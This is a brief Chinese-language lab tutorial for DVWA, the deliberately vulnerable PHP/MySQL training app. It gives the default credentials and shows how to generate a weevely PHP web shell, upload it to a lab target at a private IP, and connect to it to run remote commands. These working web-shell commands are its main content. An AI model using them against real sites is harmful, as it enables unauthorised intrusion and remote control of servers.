一、DVWA
是一种基于PHP/Mysql的web应用程序,容易受到攻击。
将DVWA security设置为low
账号密码默认为:admin password
DVMA模块:
二、weevely
(1)用来创建shell.php,其中密码是在步骤3使用
weevely generate [psw] [存放路径]
如:
weevely generate 123456 /root/shell.php
(2)将shell.php上传到目标网站
(3)weevely与目标网站进行交互,命令如下:
weevely [上传文件的url] [psw]
如:
weevely http://10.0.2.4/dvwa/hackable/uploads/shell.php 123456
在weevely输入命令后可在目标电脑执行,且能看到执行结果。